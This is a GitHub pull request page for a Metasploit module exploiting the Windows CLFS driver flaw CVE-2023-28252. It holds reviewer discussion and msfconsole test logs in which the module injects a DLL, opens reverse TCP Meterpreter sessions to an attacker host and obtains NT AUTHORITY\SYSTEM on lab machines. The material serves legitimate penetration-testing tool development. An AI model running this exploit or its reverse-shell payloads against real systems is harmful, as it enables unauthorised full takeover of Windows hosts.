Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2023-28252: Windows CLFS Driver Privilege Escalation #18250

Merged
merged 9 commits into from Sep 14, 2023
Merged

CVE-2023-28252: Windows CLFS Driver Privilege Escalation #18250

merged 9 commits into from Sep 14, 2023

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Aug 2, 2023
edited

The module steals an NT AUTHORITY\SYSTEM level token and spawns a meterpreter session with the stolen token.
The module uses the Reflective DLL Template in conjunction with the following PoC in order to exploit the following versions of Windows: Windows 10 20H2, Windows 10 21H2, Windows 11 21H2 and Windows Server 2022.

@AkechiShiro
Copy link

Is this stable yet to use ? Or it will still BSOD any Windows version tested ?

@jheysel-r7
Copy link
Contributor Author

Is this stable yet to use ? Or it will still BSOD any Windows version tested ?

Hey @AkechiShiro, if you run the exploit multiple times on the versions of Windows outlined in the documentation and continuously exit the session you obtain, the machine will eventually BSOD. I need to change how the SYSTEM token, once stolen, is used to spawn a session to avoid reference counter induced BSOD.

adfoster-r7
adfoster-r7 reviewed Aug 17, 2023
View reviewed changes
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntos.h Outdated
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks like we have similar art over in https://github.com/rapid7/metasploit-framework/tree/c748cc4ebbe810e4ee473106f1243baa056a0ae2/external/source/exploits/cve-2015-1701/cve-2015-1701

@jheysel-r7 jheysel-r7 marked this pull request as ready for review August 21, 2023 23:58
@jheysel-r7 jheysel-r7 added module a2k19 Hackathon 2019 in Austin docs and removed a2k19 Hackathon 2019 in Austin labels Aug 30, 2023
@jheysel-r7 jheysel-r7 mentioned this pull request Sep 6, 2023
Closed
@jheysel-r7 jheysel-r7 linked an issue Sep 6, 2023 that may be closed by this pull request
CVE-2023-28252: Windows CLFS Privilege Escalation. #17880
Closed
@jheysel-r7
Copy link
Contributor Author

Is this stable yet to use ? Or it will still BSOD any Windows version tested ?

Hey @AkechiShiro, just wanted to let you know the stability issue has been resolved.

@sjanusz-r7
Copy link
Contributor

sjanusz-r7 commented Sep 11, 2023
edited

Tested on Windows 10 20H2 (OS Build 19042.508) with the PAYLOAD set to windows/x64/meterpreter/reverse_tcp:

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > [*] Meterpreter session 8 opened (192.168.207.1:4444 -> 192.168.207.133:49673) at 2023-09-11 11:35:08 +0100

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  8         meterpreter x64/windows  DESKTOP-U61G519\win20h2 @ DESKTOP-U61G519  192.168.207.1:4444 -> 192.168.207.133:49673 (192.168.207.133)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : DESKTOP-U61G519
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 8...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.19042.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 4092 launched.
[*] Reflectively injecting the DLL into 4092...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.207.133
[*] Meterpreter session 9 opened (192.168.207.1:4455 -> 192.168.207.133:49674) at 2023-09-11 11:35:23 +0100

meterpreter > sysinfo
Computer        : DESKTOP-U61G519
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > bg
[*] Backgrounding session 9...
smsf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  8         meterpreter x64/windows  DESKTOP-U61G519\win20h2 @ DESKTOP-U61G519  192.168.207.1:4444 -> 192.168.207.133:49673 (192.168.207.133)
  9         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-U61G519      192.168.207.1:4455 -> 192.168.207.133:49674 (192.168.207.133)

However, on the following versions reported as vulnerable I'm getting a BSOD with KERNEL_SECURITY_CHECK_FAILURE every time:

Windows 10 - 1709 (16299.15)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  10        meterpreter x64/windows  DESKTOP-1VLS03T\win1709 @ DESKTOP-1VLS03T  192.168.207.1:4444 -> 192.168.207.130:49670 (192.168.207.130)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 10...

meterpreter > sysinfo
Computer        : DESKTOP-1VLS03T
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 10...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.16299.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 8012 launched.
[*] Reflectively injecting the DLL into 8012...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

Windows 10 - 1607 (14393.447)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  13        meterpreter x64/windows  DESKTOP-0C73FUJ\win1607 @ DESKTOP-0C73FUJ  192.168.207.1:4444 -> 192.168.207.132:49670 (192.168.207.132)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer        : DESKTOP-0C73FUJ
OS              : Windows 10 (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 13...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.14393.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 4776 launched.
[*] Reflectively injecting the DLL into 4776...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

@AkechiShiro
Copy link

AkechiShiro commented Sep 11, 2023
edited

@sjanusz-r7 How do you have access to multiple Windows builds ? I have only found latest build using evaluation ISOs ?

EDIT: Sorry I tagged the wrong person

@jheysel-r7
Copy link
Contributor Author

Tested on Windows 10 20H2 (OS Build 19042.508) with the PAYLOAD set to windows/x64/meterpreter/reverse_tcp:

However, on the following versions reported as vulnerable I'm getting a BSOD with KERNEL_SECURITY_CHECK_FAILURE every time:

My apologies @sjanusz-r7, I hadn't updated the check method. Changes have been made it should be good to be run on the following versions: Windows 10 20H2, Windows 10 21H2, Windows 11 21H2 and Windows Server 2022.

@sjanusz-r7
Copy link
Contributor

For sanity:

Windows Server 2022 (Version 21H2 - Build 20348.169)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                  Connection
  --  ----  ----                     -----------                                  ----------
  3         meterpreter x64/windows  WIN-FHO12BB2U2O\winserver @ WIN-FHO12BB2U2O  192.168.207.1:4444 -> 192.168.207.134:49672 (192.168.207.134)

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-FHO12BB2U2O
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run session=-1 lhost=192.168.207.1 lport=4455

[*] Started reverse TCP handler on 192.168.207.1:4455
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 6084 launched.
[*] Reflectively injecting the DLL into 6084...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.207.134
[*] Meterpreter session 4 opened (192.168.207.1:4455 -> 192.168.207.134:49673) at 2023-09-12 11:01:52 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Looks good 👍

@sjanusz-r7 sjanusz-r7 merged commit 8b56dc0 into rapid7:master Sep 14, 2023
34 checks passed
@sjanusz-r7 sjanusz-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 14, 2023
@sjanusz-r7
Copy link
Contributor

Release Notes

Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY/SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@sjanusz-r7 sjanusz-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

CVE-2023-28252: Windows CLFS Privilege Escalation.
4 participants
@jheysel-r7 @AkechiShiro @sjanusz-r7 @adfoster-r7